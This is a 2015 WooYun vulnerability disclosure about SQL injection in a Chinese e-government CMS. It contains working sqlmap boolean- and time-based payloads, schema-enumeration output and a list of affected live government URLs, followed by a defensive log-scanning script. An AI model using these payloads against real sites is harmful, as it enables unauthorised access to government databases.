
Vulnerability summary

Defect ID: wooyun-2015-0111283

Vulnerability title: SQL injection in an e-government system in active use

Affected vendor: 四川易极天成信息技术有限公司

Author: 路人甲

Submitted: 2015-05-04 16:42

Fixed: 2015-08-06 18:16

Published: 2015-08-06 18:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-04: Details sent to the vendor; awaiting vendor handling
2015-05-08: Vendor confirmed; details disclosed to the vendor only
2015-05-11: Details opened to third-party security partners
2015-07-02: Details disclosed to core white hats and domain experts
2015-07-12: Details disclosed to regular white hats
2015-07-22: Details disclosed to intern white hats
2015-08-06: Details disclosed to the public

Brief description:

An e-government system with a very large user base

Detailed description:

Vendor: 四川易极天成信息技术有限公司. Its user base is huge, so surely this one doesn't count as a small vendor this time... I searched, and nobody had submitted it before...

[Screenshot: 天成.png]


The problem is in the search function: the infotitle parameter is injectable, with both boolean-based blind and time-based blind injection confirmed.

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


Place: GET
Parameter: infotitle
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS
[15:03:15] [INFO] retrieved: HR
[15:04:10] [INFO] retrieved: IX
[15:05:15] [INFO] retrieved: MDSYS
[15:07:25] [INFO] retrieved: OE
[15:08:32] [INFO] retrieved: OLAPSYS


[Screenshot: 天成1.png]


#2:

http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111


Place: GET
Parameter: infotitle
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111%' AND 9973=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(98)||CHR(87)||CHR(69),5) AND '%'='
---
[15:29:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:29:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:29:24] [INFO] fetching database (schema) names
[15:29:24] [INFO] fetching number of databases
[15:29:24] [INFO] retrieved:
[15:29:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
2


[Screenshot: 天成2.png]


#3:

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


sqlmap identified the following injection points with a total of 346 HTTP(s) requests:
---
Place: GET
Parameter: infotitle
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS


[Screenshot: 天成3.png]


#4:

http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11


Place: GET
Parameter: infotitle
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infotitle=11%' AND 1983=1983 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infotitle=11%' AND 5133=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(65)||CHR(117)||CHR(112),5) AND '%'='
---
[15:09:58] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:09:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:09:58] [INFO] fetching database (schema) names
[15:09:58] [INFO] fetching number of databases
[15:09:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:09:58] [INFO] retrieved: 24
[15:10:08] [INFO] retrieved: APEX_030200
[15:11:43] [INFO] retrieved: APPQOSSYS
[15:13:00] [INFO] retrieved: CTXSYS
[15:13:53] [INFO] retrieved: DBSNMP
[15:14:47] [INFO] retrieved: EGSS1
[15:15:33] [INFO] retrieved: EXFSYS
[15:16:26] [INFO] retrieved: FLOWS_FILES
[15:17:57] [INFO] retrieved: HR
[15:18:19] [INFO] retrieved: IX
[15:18:42] [INFO] retrieved: MDSYS
[15:19:27] [INFO] retrieved: OE
[15:19:49] [INFO] retrieved: OLAPSYS
[15:20:50] [INFO] retrieved: ORDDATA
[15:21:50] [INFO] retrieved: ORDSYS
[15:22:43] [INFO] retrieved: OUTLN
[15:23:29] [INFO] retrieved: OWBSYS
[15:24:21] [INFO] retrieved: PM
[15:24:44] [INFO] retrieved: SCOTT
[15:25:32] [INFO] retrieved: SH
[15:25:55] [INFO] retrieved: SYS
[15:26:26] [INFO] retrieved: SYSMAN
[15:27:18] [INFO] retrieved: SYSTEM
[15:28:11] [INFO] retrieved: WMSYS
[15:28:56] [INFO] retrieved: XDB
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EGSS1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[15:29:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ldj.luzhou.gov.cn'


[Screenshot: 天成4.png]


#5:

http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11


Parameter: infotitle
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 9941=9941 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 8273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(74)||CHR(100)||CHR(79),5) AND '%'='
---
[15:03:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:03:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:03:18] [INFO] fetching database (schema) names
[15:03:18] [INFO] fetching number of databases
[15:03:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:03:18] [INFO] retrieved: 22
[15:03:54] [INFO] retrieved: CTXSYS
[15:06:19] [INFO] retrieved: DBSNMP
[15:09:06] [INFO] retrieved: DMSYS
[15:11:10] [INFO] retrieved: EGSS_USER
[15:15:31] [INFO] retrieved: EXFSYS
[15:18:35] [INFO] retrieved: HJEGSS
[15:21:43] [INFO] retrieved: HR


[Screenshot: 天成5.png]


---------------------------------------------------------------
Other affected instances:

http://www.lzjyrd.gov.cn/template/v2/searchResult.jsp?infotitle=1
http://cuiping.gov.cn/template/hjbh/pagelist_search.jsp?infotitle=1
http://fsz.jiangyang.gov.cn/jyqsub8/template/jyq_fsz/pagelist_search.jsp?infotitle=1
http://www.lzhb.gov.cn/template/default/h_search.jsp?infotitle=1111
http://www.hjcom.gov.cn/template/hj_jingjixinxiju/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eacdda2780398&infotitle=1111
http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11
http://www.hjdaj.com/template/hjdaj/pagelist_search.jsp?fatherid=5c26e0783e83020b013e8c4bb2810441&infotitle=11
http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11
http://www.hjjsj.gov.cn/template/hjxzjj/pagelist_search.jsp?fatherid=5c26e0783fa445fb013fa93a42190254&infotitle=111
http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11
http://www.hjxblz.gov.cn/template/hjxblz/list_1.jsp?fatherid=5c26e0783ea435d3013ea5c27d6b002a&infotitle=11
http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111
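The two probe shapes sqlmap reported above (a quote break-out followed by an n=n tautology for the boolean-blind case, and DBMS_PIPE.RECEIVE_MESSAGE as the Oracle delay primitive for the time-based case) are easy to find after the fact in the web server's access logs, which is how an operator of one of these sites would confirm whether the search endpoint was probed. The following Python scanner is an added example, not part of the original report or the vendor's product: it percent-decodes each request's query string and flags the parameter carrying either signature; the log lines are constructed for the example and use documentation IP ranges.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures of the two probe types sqlmap reported against `infotitle`:
#  - boolean-based: 11%' AND 3061=3061 AND '%'=        (quote break-out plus n=n tautology)
#  - time-based:    ... AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(...,5) ...  (Oracle delay primitive)
SIGNATURES = [
    ("boolean-blind tautology",
     re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\s+AND\s+'", re.I)),
    ("oracle time-based blind",
     re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I)),
]

# Common Log Format: client - - [timestamp] "METHOD target HTTP/x.y" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not traffic captured from the affected sites.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2015:14:47:10 +0800] "GET /template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11 HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2015:14:47:11 +0800] "GET /template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%25%27%20AND%203061%3D3061%20AND%20%27%25%27%3D HTTP/1.1" 200 5120
203.0.113.5 - - [04/May/2015:14:47:17 +0800] "GET /template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%25%27%20AND%204524%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28108%29%7C%7CCHR%2888%29%7C%7CCHR%28120%29%2C5%29%20AND%20%27%25%27%3D HTTP/1.1" 200 5120
198.51.100.9 - - [04/May/2015:14:48:02 +0800] "GET /template/default/soushuo.jsp?infotitle=%E5%9C%9F%E5%9C%B0 HTTP/1.1" 200 4096
"""

def inspect_request(target):
    """Return (param, label) for the first query parameter matching a signature, else None.

    parse_qsl percent-decodes values, so the probe is matched in its decoded form
    (the form sqlmap prints), not in the encoded form that appears in the log.
    """
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                return name, label
    return None

def scan_log(text):
    """Return [(line_no, client_ip, param, label)] for every request carrying a probe."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client, _timestamp, target = match.groups()
        found = inspect_request(target)
        if found:
            hits.append((line_no, client, *found))
    return hits

if __name__ == "__main__":
    for line_no, client, param, label in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {client} -> {param}: {label}")
```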


Proof of vulnerability: (identical to the detailed description above)



Fix recommendation:

。。。。。

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-05-08 18:15

Vendor reply:

CNVD did not directly reproduce the described situation; the case has been forwarded by CNCERT to the Sichuan branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet